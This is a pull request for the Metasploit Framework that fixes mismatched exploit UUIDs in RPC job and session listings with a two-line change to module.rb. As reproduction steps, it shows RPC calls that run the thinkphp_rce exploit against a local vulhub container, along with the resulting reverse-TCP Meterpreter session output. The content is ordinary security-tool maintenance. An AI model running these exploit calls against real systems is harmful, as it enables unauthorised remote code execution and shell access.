### PR TITLE
Fixes RPC `exploit_uuid` correlation for jobs and sessions

### DIFF
--- a/lib/msf/core/module.rb
+++ b/lib/msf/core/module.rb
@@ -114,6 +114,8 @@ module Msf
       @module_info_copy = info.dup
 
       self.module_info = info
+      # Initialize UUID for RPC compatibility
+      uuid
 
       set_defaults
 


### PR DESCRIPTION
This PR fixes https://github.com/rapid7/metasploit-framework/issues/20411.

It adds back in a method that was previously removed as part of #20170. I believe this is needed to initialize the UUID for which the RPC was relying on.

## Before
```
>> rpc.call("module.execute", "exploit", "unix/webapp/thinkphp_rce", {"RHOSTS"=> "127.0.0.1", "RPORT"=> "80", "LHOST"=>"192.168.0.148", "LPORT"=>"4444"})
=> {"job_id"=>0, "uuid"=>"mhep3hht"} <--- UUID DOES NOT MATCH
>> rpc.call("session.list")
=>
{1=>
  {"type"=>"meterpreter",
   "tunnel_local"=>"192.168.0.148:4444",
   "tunnel_peer"=>"192.168.0.148:52172",
   "via_exploit"=>"exploit/unix/webapp/thinkphp_rce",
   "via_payload"=>"payload/linux/x64/meterpreter/reverse_tcp",
   "desc"=>"Meterpreter",
   "info"=>"www-data @ 172.17.0.2",
   "workspace"=>"default",
   "session_host"=>"127.0.0.1",
   "session_port"=>80,
   "target_host"=>"127.0.0.1",
   "username"=>"cgranleese",
   "uuid"=>"scgei0da",
   "exploit_uuid"=>"tephkmjp", <--- UUID DOES NOT MATCH
   "routes"=>"",
   "arch"=>"x64",
   "platform"=>"linux"},
```

## After
```
>> rpc.call("module.execute", "exploit", "unix/webapp/thinkphp_rce", {"RHOSTS"=> "127.0.0.1", "RPORT"=> "80", "LHOST"=>"192.168.0.148", "LPORT"=>"4444"})
=> {"job_id"=>0, "uuid"=>"civr9dmj"} <--- UUID DOES MATCH
>> rpc.call("session.list")
=> {}
>> rpc.call("module.execute", "exploit", "unix/webapp/thinkphp_rce", {"RHOSTS"=> "127.0.0.1", "RPORT"=> "80", "LHOST"=>"192.168.0.148", "LPORT"=>"4444"})
=> {"job_id"=>1, "uuid"=>"zm02nyic"}
>> rpc.call("session.list")
=>
{1=>
  {"type"=>"meterpreter",
   "tunnel_local"=>"192.168.0.148:4444",
   "tunnel_peer"=>"192.168.0.148:57264",
   "via_exploit"=>"exploit/unix/webapp/thinkphp_rce",
   "via_payload"=>"payload/linux/x64/meterpreter/reverse_tcp",
   "desc"=>"Meterpreter",
   "info"=>"www-data @ 172.17.0.2",
   "workspace"=>"default",
   "session_host"=>"127.0.0.1",
   "session_port"=>80,
   "target_host"=>"127.0.0.1",
   "username"=>"cgranleese",
   "uuid"=>"rhknkq7h",
   "exploit_uuid"=>"zm02nyic", <--- UUID DOES MATCH
   "routes"=>"",
   "arch"=>"x64",
   "platform"=>"linux"}}
```

## RPC setup
Terminal window 1:
```
ruby msfrpcd -U user -P pass -f
```
Terminal window 2:
```
ruby msfrpc -U user -P pass -a 0.0.0.0
```

## Target setup
```
docker run -it -p 80:80  vulhub/thinkphp:5.0.23
```

## RPC commands
Exploit above target. Must be an exploit module:
```
rpc.call("module.execute", "exploit", "unix/webapp/thinkphp_rce", {"RHOSTS"=> "127.0.0.1", "RPORT"=> "80", "LHOST"=>"<LHOST>", "LPORT"=>"4444"})
```
List sessions:
```
rpc.call("session.list")
```

## Verification

- [ ] Completing the above steps and running `rpc.call("session.list")` the UUIDs should now match
